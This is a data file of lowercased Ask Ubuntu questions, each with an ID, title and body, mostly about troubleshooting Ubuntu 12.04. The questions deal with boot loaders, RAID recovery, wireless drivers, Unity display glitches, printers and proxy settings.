with a different linux-image 3.0.0-19-generic-pae instead of 3.2.0-24-generic-pae , which i believe is 12.04 precise default , then everything started to work again , now i 've installed 3.4.0-1-generic-pae from same ppa and everything goes flawless so i believe the issue is either with linux-image 3.0.0-19-generic-pae or xserver-xorg-video-intel 2.17 . hope this helps someone in the future . ps : now xrandr shows multiple modes for my laptop monitor $ xrandr screen 0 : minimum 320 x 200 , current 3120 x 1050 , maximum 8192 x 8192 edp1 connected 1440x900+1680+0 ( normal left inverted right x axis y axis ) 303mm x 189mm 1440x900 60.0*+ 59.9 40.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis )
134034	how do i use my ubuntu machine as a bridge to allow an old xp machine internet access ?	my ubuntu box is connected to the home network with a g wireless card . my wife wants internet access with an old xp machine for light email and a typing program that links to a database for progress reports . again , i assume that is light use . can i bridge her xp machine through my ubuntu ( wired connection between nic 's - they are 4 feet apart ) if so , how do i do this ? |dsl| - > wireless - > |ubuntu| ( good connection ) ==o==o== wired - > |xp| yes , i know i could buy a wireless card for the xp , but i 'm cheap , ok !
134035	how do i get the latest gimp version available ?	i understand that there is a new version of the gimp available , although it appears that the only way of doing this is by compiling from source : p is there another way of getting it , or if i have to compile can i do that through the terminal or better still ; a gui ?
134051	missing access rights to other partitions	i have windows 7 dual booting with ubuntu 12.04 installed in another partition how can i edit my documents and copy files or create folders in my other three partitions partitions ? trying to edit a document i get the error : this doc ca n't be edited , possibly due to missing access rights . do you want to edit a copy of the doc ? i used the ntfs configuration tool to mount my drives .
134052	netbook does not boot	i installed lubuntu 12.04 via usb-stick on my eee pc 1005ha . it booted fine from the hdd with the usb plugged in . if i remove the usb it wo n't boot from the hdd . when i plug the usb back in , it boots from the hdd just fine but it wo n't let me boot from the stick even when i select it in the bios . i 've never experienced something like this . without the usb plugged in , i just get a blinking underscore and that 's it .
134053	why should i go through the purchasing process to install a product priced $ 0.00 ?	in software center , i have to run through the purchasing process even if a product is priced with 0 $ ( e.g . 'full circle magazine ' ) . that makes no sense to me . if the price of the product is 'zero ' , it should not lead through the purchasing process and instead should just let me install the product straightaway . can i know why this is the case and can someone point me to the design decisions for this if there are any ?
134059	which package contains ec2 kernel in ubuntu 12.04	in lucid lynx ( 10.04 lts ) i used linux-image-ec2 package which is not available any more . i need a package containing those files ( or newer ) vmlinuz-2.6.32-345-ec2 initrd.img-2.6.32-345-ec2 using those images for xen based virtual hosts with pygrub .
134061	how to make selected-folder text more legible in marlin file manager ?	in my ubuntu 12.04 i installed marlin file manager . it 's difficult for me to read the text of a selected file/folder . it surrounded by red line and background is white and text is grey . hard to read . in my screenshot , it faded to white . but i want to know how i can change its text and highlight color properties .
134062	mdadm raid 0 wo n't mount : one drive has bad superblock	i 'm quite new in the world of linux and software-raid but i encountered a problem in which i hope you guys can help me . few days ago the system was not shutdown properly and when i booted the mdadm software raid would n't mount anymore and i got an error which stated that /dev/sdb1 ( which is part of my raid 0 array ) has a bad superblock . i decided to ignore mounting the since my system does n't depend on it . so i could login and do some tests . my array contains two disks ( sdb1 and sde1 ) which are set in raid0 . both drives are identical . when i run fsck /dev/sdb1 i get the error that my superblock has more blocks then the physical drive . $ fsck /dev/sdb1 fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) the filesystem size ( according to the superblock ) is 488380672 blocks the physical size of the device is 244190390 blocks either the superblock or the partition table is likely to be corrupt ! abort < y > ? my other drive seemed to be ok , but now i get the following error , i assume it has to do with sdb1 missing $ fsck /dev/sde1 fsck from util-linux 2.20.1 fsck : fsck.linux_raid_member : not found fsck : error 2 while executing fsck.linux_raid_member for /dev/sde1 in fdisk all seems to be okay , or at least as they we 're before.. $ fdisk -l disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a091a device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 390721535 195109889 5 extended /dev/sda5 501760 390721535 195109888 8e linux lvm disk /dev/mapper/server1-root : 193.6 gb , 193646821376 bytes 255 heads , 63 sectors/track , 23542 cylinders , total 378216448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/server1-root does n't contain a valid partition table disk /dev/mapper/server1-swap_1 : 2143 mb , 2143289344 bytes 255 heads , 63 sectors/track , 260 cylinders , total 4186112 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/server1-swap_1 does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 78 heads , 63 sectors/track , 397542 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000300 device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 24 heads , 63 sectors/track , 1292014 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 83 linux warning : gpt ( guid partition table ) detected on '/dev/sdd ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdd : 500.1 gb , 500107862016 bytes 81 heads , 63 sectors/track , 191411 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 2048 976773167 488385560 83 linux warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sde : 1000.2 gb , 1000204886016 bytes 78 heads , 63 sectors/track , 397542 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000300 device boot start end blocks id system /dev/sde1 2048 1953525167 976761560 fd linux raid autodetect when i run dumpe2fs /dev/sdb1 i get : dumpe2fs 1.42 ( 29-nov-2011 ) filesystem volume name : < none > last mounted on : /media/raid0 filesystem uuid : 52e0e3eb-40d7-49fa-9b35-be6513a782d2 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : ext_attr resize_inode dir_index filetype extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : not clean with errors errors behavior : continue filesystem os type : linux inode count : 122101760 block count : 488380672 reserved block count : 4883806 free blocks : 166355414 free inodes : 121871448 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 907 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 raid stride : 128 raid stripe width : 256 flex block group size : 16 filesystem created : sun apr 22 21:57:36 2012 last mount time : thu may 3 00:01:08 2012 last write time : tue may 8 20:33:15 2012 mount count : 24 maximum mount count : 35 last checked : sun apr 22 21:57:36 2012 check interval : 15552000 ( 6 months ) next check after : fri oct 19 21:57:36 2012 lifetime writes : 1809 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 default directory hash : half_md4 directory hash seed : 54b59b52-4cfc-4bea-8c5a-5fc730317f4f journal backup : inode blocks and a whole bunch of these : group 0 : ( blocks 0-32767 ) [ itable_zeroed ] checksum 0x6848 , unused inodes 0 primary superblock at 0 , group descriptors at 1-117 reserved gdt blocks at 118-1024 block bitmap at 1025 ( +1025 ) , inode bitmap at 1041 ( +1041 ) inode table at 1057-1568 ( +1057 ) 23517 free blocks , 8182 free inodes , 1 directories when i run cat /proc/mdstat i get : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : inactive sdb [ 0 ] ( s ) 976761560 blocks super 1.2 md127 : inactive sde1 [ 1 ] ( s ) 976760536 blocks super 1.2 unused devices : < none > so all of the sudden i have two raid arrays now ... i 've tried the method mentioned in this topic where they suggest to use backup sectors . but no luck , the error about a superblock larger then the physical drive persists . can you guys help me ? i 'm quite scared i lost my data now.. edit : contents of mdadm.conf file added # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts # mailaddr # definitions of existing md arrays # array /dev/md/0 metadata=1.2 uuid=7658dc76 : c33da511 : d40c5dee : c5d5143d name=server1:0 # this file was auto-generated on fri , 27 apr 2012 18:38:03 +0200 # by mkconf $ id $ array /dev/md/0 metadata=1.2 uuid=7658dc76 : c33da511 : d40c5dee : c5d5143d name=server1:0 array /dev/md/0 metadata=1.2 uuid=3720f7a5 : ae73fb52 : deee0813:677105ae name=server1:0
134070	( dual monitor and 12.04 ) snapping window to full screen puts the window on other monitor	background ( this problem does not occur in unity 2d ) when moving a window around , and putting the cursor to the top of a screen , the orange box expands across the screen and you let go and the window goes full screen ... . at least , it 's supposed to . when i 'm not in unity2d ( i.e . unity 3d or simply `` unity '' as it shows when i log in ) , i can put the window full screen on my right-side monitor , but if i push the window to the top of the left monitor and let go , it snaps to full-screen on the right monitor ! ! ! ! ! it 's really frustrating , because of course the whole purpose of having two monitors is to be able to view different things at the same time . question does anyone know what is causing this ? i feel like maybe it 's accepting the right side monitor as the `` primary '' or something like that . it only occurs sometimes , not constantly . it only started doing it since the update to 12.04 . also , compiz process is running and taking a lot of my processor , even if the computer is doing nothing . my cpu used to idle at around 30-31c , but now just sitting there , it 's around 39-41c ... .12.04 is sucking big time right now in my opinion ( not worth much ) . thanks for the input !
134077	wifi signal weak while on an hp pavilion g6	i have just installed ubuntu 12.04 lts along with the standard windows 7 on my new hp pavillion g6 ( amd ) . they both work fine but when i am running ubuntu , the wifi signal strength shows low ( occasionally disconnecting ) . if i run windows 7 , the signal is always very strong and it never disconnects . how can that be and is there a fix ?
134082	considering a switch from osx to ubuntu	i 'm brand new around here and i had a few questions for the community . hopefully you all can point me in the right direction ? my situation is i 've currently got a five year old macbook pro running os 10.6 . i 've been reading lately that apple is likely to drop support , specifically security support , for this os once it releases 10.8 late this summer . my hardware is ineligible to upgrade any further but is otherwise running just fine . i do n't want to buy a new computer so i did some searching an stumbled upon ubuntu . from what i 've seen on this site and others it seems like a pretty slick os , especially for the price . but would and intel core duo with 2gb of ram be able to handle it ? also , i went out an got one of those blasted timecapsule router/wireless hard drives . i bought it specifically because i wanted to make my transition to my next mac seamless . but if i switch to ubuntu would i even be able to use the thing ? would there be any automatic back up programs i could use with it in ubuntu ? is there a ubuntu equivalent to time machine ? any guidance would be most appreciated . thank you ,
134097	unity 2d loading instead of unity 3d at login	my problem is that after choosing unity 3d at login the unity 2d loads , even though my graphics drivers seems to be working fine . unity 3d is possible to load by following commands : ps aux | grep -i unity-2 killall /usr/bin/unity-2d-spread killall unity-2d-shell killall unity-2d-panel unity then unity 3d works fine ( if i do n't kill unity 2d , i get 2 panels overlapping ) . how can i make unity 3d to load when i login ? i 'm using ubuntu 12.04 , linux kevin 3.2.0-24-generic-pae # 37-ubuntu ... i686 i686 i386 gnu/linux edit : the output of unity support test can be seen here : $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce go 7300/pcie/sse2 opengl version string : 2.1.2 nvidia 295.40 not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
134100	system crashed during update from 11.10 to 12.4 64bits	system crashed during update from 11.10 to 12.4 64 bits i had to hard reset due to inactivity during the update , after rebooting , ubuntu started , but it does n't let me to enter terminal , it only react when i search something in unity , but it does n't let me to access any window , nor terminal nor update manager , nothing , it appears that the cursor is in the center of the screen ( as it reacts as i press ctrl , but that 's all , i 've tried pressing ctrl+tab but does n't work either , i can access to anything but unity btton searches ) .
134110	very slow wireless connection ( unrelated to power management ) using netgear n150 wna1100 in 12.04	i am using a netgear n150 wna1100 usb adapter . the network driver is : ath9k_htc . when i use ubuntu 12.04 my wireless connection is much slower than when i use the wna1100 with my windows 7 installation on the same machine . i have been researching this and the most common reason for this seems to be related to power management . however for me this is off by default . i had entered a bunch of different commands and , at one stage , i got it to work at full power . but then i rebooted the machine and it went back to slow again . after entering the different commands i was afraid that i may have messed something up , so i performed a fresh install of ubuntu . i still have the same problem . my wireless connection is still much slower when using ubuntu than when using windows 7 . i am not sure what other info could help ... edit : ok , i have made live usb from the iso file i used to install ubuntu on this pc , and ran it on my laptop . still the same problem . however la [ top works grand on cable . i suppose this means that my wireless adapter or network driver can be eliminated as root of the problem.. so maybe to do with router itself ? i use zyxel p-660hw-d1
134117	hp 620 notebook makes noise when run on battery	this is seems strange but it 's true when i use my hp notebook 620 on battery it makes strange noise , i cant describe it exactly but it sounds like a clock ticking every 5 or 10 second ( maybe more ) and i ca n't find the source of it but it 's not the cpu fan nor the harddisk or the speakers for sure.. also am running dual os and there 's no noise with win7 but if i plug the charger it stops ... any idea please ? ? os ubuntu 12.04 32bit
134121	how to restore/recreate etc/resolv.conf files	i deleted both the resolvconf folder and the resolv.conf file in /etc by mistake , assuming that resolvconf was causing uck to fail . now the application has upgraded , fixing the issue , but it says no file named resolv.conf in /etc . what it says is correct because i deleted those files . is there any way to recreate the files or restore from another location ?
134123	how to show hidden menu items in the menu bar ?	in unity , the menu bar for most applications appears on the top panel , on mouse-over . additionally , one can use the keyboard to quickly access menu items by pressing alt and typing what you 're looking for . the mouse-over menu , however , hides some items . is there any way to get these to be shown , all the time ? ( is this bug ? ) the only example i know of ( and they 're hard to discover , because you ca n't enumerate choices from the alt finder , and you ca n't easily see what 's missing from the menu itself ) is the entire `` format '' menu in thunderbird . it resides under options â format , or so claims the alt finder .
134124	why do i get `` no root file system is defined '' when i try install in one partition ?	the thing is that i have 3 partitions on my computer . /dev/sda1 type : ntfs ( size 104mb ; 35mb in use ) [ this is windows loader ] /dev/sda2 type : ntfs ( size 144598mb ; 64536mb in use ) [ here i want to install ubuntu ] /dev/sda3 type : ntfs ( size 105353mb ; 20227mb in use ) [ this my backup partition i do n't wa n't to delete anything from here , i have all my necessary information ] so the problem is when i select `` device for boot loader installation '' `` /dev/sda2 '' pops out : '' no root file system is defined . please correct this from the partitioning menu . '' how can i resolve this ? : )
134126	configuring unity for individual workspaces	is there a way to make visible only the launchers on the current workspace in unity ? truthfully , would just like to keep separate programs on separate workspaces , i 'm making `` panic button ''
134129	disable shift-delete for file deletion	as an re-education procedure in order to reduce ( likely ) future data loss , i wish to disable the shift+del functionality to delete files in ubuntu ( 11.10 and 12.04 ) . also , if i could replace it with a `` stop that ! '' popup alert , even better . i know there are data recovery tools for such cases , but better never put my important data at risk due to such mistakes . and i found nothing similar around , so i hope someone here can show me how , if possible .
134133	how to recover from an upgrade failure ?	today i foolishly gave in to upgrade requests to 12.04 from 11.10 and now im having a lot of issues with the unity interface where the previous version worked seamlessly . after boot the following services are running : /usr/bin/compiz-decorator compiz unity-window-decorator unity-panel-service unity-application-daemon unity-music-daemon the main problems are : every 30seconds or so all windows and menus disappear for a few seconds leaving just the background image if the mouse goes over the task bar items on the top right of the screen it causes a segmentation fault of unity.glib.dbusproxy `` unity.glib.dbusproxy glibdbusproxy.cpp:257 can not call method setviewtype proxy /com/canonical/unity/lens/commands does not exist window boarders disappear and i ca n't move or resize windows if the mouse goes over the app menu on the left i get a compiz segfault composite sync not supported compiz [ 7361 ] : segfault at 0 ip ... sp ... error 4 in libunityshell.so [ ... ] the computer will not shut down when i select `` shut down '' from the task bar on the top right . ive tried a lot of different commands to try and fix this based on other related questions : unity -- reset unity -- replace compiz -- replace metacity -- replace & unity compiz-decorator gconftool-2 -- recursive-unset /apps/compiz-1 gconftool-2 -- recursive-unset /apps/compizconfig-1 rm -rf ~/.gconf* ~/.gnome* ~/.metacity ~/.compiz ~/.conf* disabling animation features etc ... in gconf-editor but any changes cause a segmentation fault '' gconf-client-lookup assertion failed '' changing ccsm settings ( compiz config settings manager ) reverting to gnome-session-fallback but it 's not possible due to a dependency issue '' gnome-session : breaks : unity-2d ( < 5.4~ ) but 5.2.0-0ubuntu1 is to be installed e : error '' so ive made zero progress . any suggestions appreciated : ) i have an intel atom netbook with 945gse express integrated graphics controller -damian
134136	error while loading shared libraries : libqtsql.so.4 : can not open shared object file : no such file or directory	a similar issue is found elsewhere but only with 32bit programs . i have this problem when trying to run clementine - which is 64bit , i checked the binary i have - and ubuntu-one-control-panel-qt i 'm starting to feel like i 've tried everything . is there a way to restore my qt installation to some kind of default state ? i think this might have happened after i uninstalled rhythmbox with 'sudo apt-get remove rhythmbox ' . i 've since reinstalled rhythmbox though , and thought any removed dependencies would be reinstalled with apt ... . edit : this is my apt history log : https : //gist.github.com/2646562 line 215 is when i first installed clementine . it was obviously working at this point . removing rhythmbox at line 305 does n't look like it did too much damage . yet that is the point when it stopped working , as most of the rest of the log is me trying to fix clementine . just to repeat : i do n't think any qt apps are working on my installation . i 'm about to research how to completely remove and reinstall qt , see if that 's a hopeful avenue .
134145	how can i install ubuntu if my computer does n't boot from the cd ?	i have installed ubuntu alongside windows 7 in a brand new computer and it worked fine for some days . eventually , windows showed some problems , but after a safety mode initialization it was working again . then , ubuntu cracked and i could n't use it . after that , i have reinstalled windows using the recovery cd and now i ca n't boot from the cd . i put the cd with the ubuntu image on the drive , turn the computer on , press f12 to choose the drive for the boot , select to boot from the cd and then it automatically starts windows , ignoring my choice . how can i substitute windows for ubuntu ?
134146	grub bootloader took over my computer	i have two completely separate drives in my computer . one has windows7 and that was already installed . i installed ubuntu on my other drive specifically for ubuntu , and now grub boot-load shows up no matter what order my boot priority is in my bios . this never happened before , and they both kept on their own drives . what happened ? the only way for me to get into windows anymore is for grub boot-loader to load up and to select the windows7 loader listed towards the bottom of the list ( on a completely separate drive . i want them separate hence the reason i have two separate drives . i have tried to repair the windows boot-loader with the installation disc , but it does not even show up in the list . i think ubuntu installed grub into the windows boot partition maybe ? also , i have unplugged the ubuntu drive and re-booted . the windows 7 will not start . after bios int , computer just sits . what happened ? !
134147	running ubuntu on uefi mode	i tried installing ubuntu 11.04 on physical machine selecting uefi mode . it displays grub menu and nothing gets displayed . any idea if ubuntu 11.04 supports uefi mode ? if yes , how shall i make it work . when i am trying the default bios mode , it works fine .
134156	ubuntu 12.04 boot screen remained like 10.04	the system is upgraded from ubuntu 10.04 to 12.04 , yet the boot screen is same . it takes longer to boot than before and system checks disk drives for error on every startup . can i get any help on it ? ? ? ? ?
134162	12.04 gui freeze-up	this may have been asked before , but i have yet to find any posted solution : when i boot up into ubuntu , i get about 10-15 minutes before everything freezes up . i 'm running a radeon 7970hd graphics card , and i 'm not sure what the deal is . i have n't installed any drivers yet - does this mean i 'm missing them ? also , i 'm not able to change my screen resolution ( which i think means it 's driver related , but i do n't know enough to say for sure ) . does anyone have a solution ? thanks !
134163	is this soundjuicer bug in 12.04 , or an os bug ( and where is there a solution ) ?	when i used soundjuicer the first time in 12.04 , it worked correctly . when reading the second cd , it failed completely with the message : `` soundjuicer could not read the track listing on this cd . reason : can not access cd : the specified location is not mounted '' . which is odd , since i am getting there through the gui file system . is this a known bug ( but is somehow not searchable using the exact error message , either as a quoted string , or as the list of tokens ) ? is there some other search term that i should have used ? i 'll admit to being a newbie ubuntu user , but i use redhat at work , and often have to debug system level events -- those are easy to find via the error string . am i wrong to expect otherwise here ? should i have searched the soundjuicer site ? i sent a `` report '' ( is that ubuntu-bug ? i ca n't find that in my process table in the system-monitor -- is it for some reason not listed ? ) , but thought that instead of waiting on an answer , i 'd try to find a solution without waiting since there was a ( remarkably ) similar bug in 11.10 . the core-dump is `` helpfully '' hidden ( and i can not seem to copy from the report in any case ) , but i can report that the problem originates in gvfsd-cdda .
134164	maas enlistment through 12.04 installation cd fails	i am trying to enroll my nodes in my maas cluster . i am doing this by booting them from the 12.04 installation cd , and choosing the maas installation option . i 'm only trying to set up one node right now . when i do the enrollment process , the node shutsdown , and i see 0 nodes on the maas homepage of my master node . i tried adding the node from the maas web gui , when i do this , i get an error on the page that says : unable to create node : unknown problem encountered with the cobbler server . in the cobbler.log is the following : tue may 8 20:43:47 2012 - debug | remote maas authorization result : true ; user ( ? ) tue may 8 20:43:47 2012 - info | find_items ; [ 'system ' ] tue may 8 20:43:47 2012 - info | exception occured : < class 'cobbler.cexceptions.cx ' > tue may 8 20:43:47 2012 - info | exception value : 'dns-name duplicated : node1' tue may 8 20:43:47 2012 - info | exception info : file `` /usr/lib/python2.7/dist-packages/cobbler/remote.py '' , line 1944 , in _dispatch return method_handle ( *params ) file `` /usr/lib/python2.7/dist-packages/cobbler/remote.py '' , line 910 , in xapi_object_edit self.modify_system ( handle , 'modify_interface ' , imods , token ) file `` /usr/lib/python2.7/dist-packages/cobbler/remote.py '' , line 827 , in modify_system return self.modify_item ( `` system '' , object_id , attribute , arg , token ) file `` /usr/lib/python2.7/dist-packages/cobbler/remote.py '' , line 820 , in modify_item return method ( arg ) file `` /usr/lib/python2.7/dist-packages/cobbler/item_system.py '' , line 644 , in modify_interface if field == `` dnsname '' : self.set_dns_name ( value , interface ) file `` /usr/lib/python2.7/dist-packages/cobbler/item_system.py '' , line 288 , in set_dns_name raise cx ( `` dns-name duplicated : % s '' % dns_name ) it seems like there is a chicken and egg game being played between dnsmasq 's dns server , and the cobbler 's hostname database -- this is just a guess on my part . here is the contents of dnsmasq.leases : the mac addr of node1 is 00:03:47:22:1c : e2 dbuttric @ sid : /var/lib/misc $ more dnsmasq.leases 1336531172 00:03:47:22:1c : e2 192.168.5.119 * * 1336530695 00:90:27:32:3b:53 192.168.5.148 node3 * 1336530676 00:90:27:18 : f2:0b 192.168.5.242 node2 * how can i delete hostnames from cobbler , and retry my node adding activities ? here is more : i can successfully register a node and the maas server shows that it has 1 node registered in it . 5 minutes later , i go back to the maas web gui , and it reports 0 nodes . i have not looked at error logs yet , but what can cause this to happen ? should i just try re-installing the master node ?
134165	which release should i install , given my system specs ?	i 'm new to ubuntu and am trying to run something better than 10.04 . i have a toshiba with the following : 1gb ram 1.86ghz processor ati mobility radeon 600x . i was wondering which version i should use and if i could update something in the system to make a newer version work . i have booted 11.10 successfully twice but it usually gets the background image after the log in and stops , both from installs from wubi and a live cd . is there a good update for a graphics driver i should use and what would boot better , a live cd or wubi ?
134168	trackpad buttons on 2012 samsung series 9 not working properly , appears to double click and does n't have right click	these buttons work fine in windows , but not in ubuntu 12.04 . the buttons are part of the trackpad itself so i figure that 's what 's causing the problems , but is there any way to get ubuntu to support this type of touchpad ? the left click button works , but it double clicks . for instance , if i click a link with ctrl held down , it opens two new tabs . right button does n't work at all .
134169	how can i make a write-only view of a folder ?	i want to have a place on the filesystem that presents a write-only `` view '' of another folder that i have read-write access to . i 'm picturing something that 's similar in behavior to an ftp drop box , where files can be copied into it but not read out of it , e.g . : $ ls read-write-view/ write-only-view/ read-write-view/ : a b c write-only-view/ : $ cp d write-only-view/ $ ls read-write-view/ write-only-view/ read-write-view/ : a b c d write-only-view/ : it 's important that this works as in the example â the contents are still visible when accessed through read-write-view/ , and both `` views '' are functional for a single user . how can i set something like this up ? some clever arrangement of symbolic links , perhaps ? or an unusual configuration of a bind mount ?
134170	how do i get a tp-link tn-wn727n usb wireless stick working ?	just bought a new tp-link tl-wn727n usb thumb drive . i 'm running ubuntu 12.04 32-bit . when i plug the stick in , nothing happens . this may be normal for linux veterans but as a new linux user coming from windows it seems weird . i used the lsusb command and the device appears in the terminal as : bus 002 device 007 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter it is not showing up in the network connections list and i have no idea where to go from here .
134172	window title-bars missing occasionally in unity	window ( title and icon ) sometimes does n't appear . as a solution to this , i have to logout and login again . is there something wrong with my system ? how to make sure that this does n't happen again ?
134174	where is the oracle java jdk keystore located ?	installed oracle java with the webupd8 ppa and need to tweak some policy settings ( access to clipboard specifically ) webupd8 plug : http : //www.webupd8.org/2011/09/how-to-install-oracle-java-7-jdk-in.html ( these guys have done alot for the ubuntu community ) previously it was under /etc/java-6-oracle google does n't have any answers on this one -- any ideas ?
134175	compiz anaglyph plugin problems on 12.04	well , i 've had the compiz anaglyph plugin installed since i started working with oneiric . it 's worked superbly ... that is , until i upgraded to precise . all the other eyecandy i use for ubuntu works flawlessly . did something happen during the upgrade , or is the anaglyph plugin just incompatible with 12.04 ?
134182	restart the computer all menus are disappeared	i had setup compiz and advanced desktop effect sitting then i change the effects and enable cube.when i restart the computer all menus are disappeared.how can i fix this problem ?
134183	any way to get colored icons in alt-tab task switcher in kde ?	in kde , i use the `` layout based switcher '' alt-tab task switcher , with the `` informative '' layout . all the layouts that display both icons and text have the icons for all but the currently selected task grayed out . is there any way to have all icons displayed in color ? as the purpose of the task switcher is to switch to another task , it really makes no sense to have the icons for those tasks grayed out . all it does is to make it take longer to find the right icon as they look less familiar and much more similar to each other .
134184	how to make lenovo ideapad s10-3s netbook hibernate ?	my lenovo ideapad s10-3s , which is using ubuntu 12.04 lts , does not hibernate . the error message shown is pm : not enough free swap , although my swap is around 3gb and my ram only around 1gb . how can i make it hibernate ? i have already tried doing this how to enable hibernation in 12.04 ? to enable my hibernation . update this is the screenshot after i used the swapon -s command suggest in neon_overload 's answer : 2nd update i solved this problem by installing zramswap-enabler from : http : //modifyubuntu.com/12.04/ # zram or http : //www.webupd8.org/2011/10/increased-performance-in-linux-with.html after i installed zramswap-installer and rebooted my netbook , it is able to hibernate . the screenshot of swapon -s after i installed zramswap-enabler :
134190	if i am on workspace 1 , is there a way to hide the unity buttons from running programs on workspace 2 from showing up on workspace 1 ?	i 'm making a keyboard shortcut to go from the porn-workspace i 'm using back to workspace 1 in a pinch , but it does me no good if unity toolbar is full of `` image viewer '' and porn sites or movie player .
134191	how to create an ftp account for one folder ?	i have a folder : /srv/ftp_folder how would one go about setting up an ftp account with upload/download for that folder only with no other access ?
134193	how do i configure dual sided printing on a brother 2270dw ?	when i want to print something , i do n't get the option to print on both sides of a paper although my printer supports this feature . how can i fix this ? do i have to download a proprietary driver ? my printer is a brother 2270dw .
134197	can i run ubuntu from a cd ?	i have installed as primary os windows xp sp3 . would like to have too ubuntu 12.04 or 11.10 but will be more benefit for me to run from a cd . it 's mean i like to install ubuntu not in the hard disk but in a cd . can i do this ? and how ? thanks !
134201	boost 1.48 and default ( 1.46 ) on precise pangolin12.04	the precise release of ubuntu has two libboost-dev packages . the default is 1.46 , but there is also a 1.48 . if i install both , where are the headers and libraries for 1.48 installed ? are the locations the same if i only install 1.48 ?
134202	ubuntu 12.04 - ca n't get ubuntu one / update-manager to use system proxy settings	i set the network proxy as per the system settings gui but this is not picked up by ubuntu one or update-manager - i just get failed to update repository information . even apt does n't work . i then added a proxy into the config file manually in /etc/apt/apt.conf.d/ with : acquire : http { proxy `` http : //whatever:1234 '' ; } ; i could then run apt-get successfully . but still not the two packages above . why are n't the system settings working ?
134207	error 15 after manually installing ubuntu 12.04 dualboot windows 7	( this post contains as the same as my preceding post on grub rescue problem after installing ubuntu 12.04 lts since i 've post it on the wrong place ) thanks god i found this page . i 'm a newby from indonesia , and i have a laptop with 2 oses ( 7 and precise ) installed . i have installed ubuntu 12.04 manually by replacing blankon 4.0 's ( an ubuntu-based indonesian distro ) partition . i made /boot mountpoint and then chose it as the place for bootloading . as the result , i 've been experiencing error 15 until now , and i have to boot my laptop from paragon rescue kit every time i want to use it . is there any way to solve the problem ? terima kasih ( thanks )
134210	show me only picture thumbnails	is it possible in nautilus that it shows thumbnails only for pictures and for all others like videos , pdfs , etc thumbnails are disabled ?
134211	dell photo 924 aio printer not being detected	i am wondering if anyone knows any tricks to get a dell photo 924 printer to work with ubuntu 12.04 ? i 've tried a couple dozen drivers within ubuntu , none have worked . i 've googled for a few hours with no luck with any method i found and tried . i have the driver disc which also did n't work . i 'll be grateful for any directions i can get with this .
134219	how to install rtorrent on ubuntu 12.04 ?	i have newly installed ubuntu server 12.04 and i want to use it ad torrent down-loader . can anyone help me ? thanks !
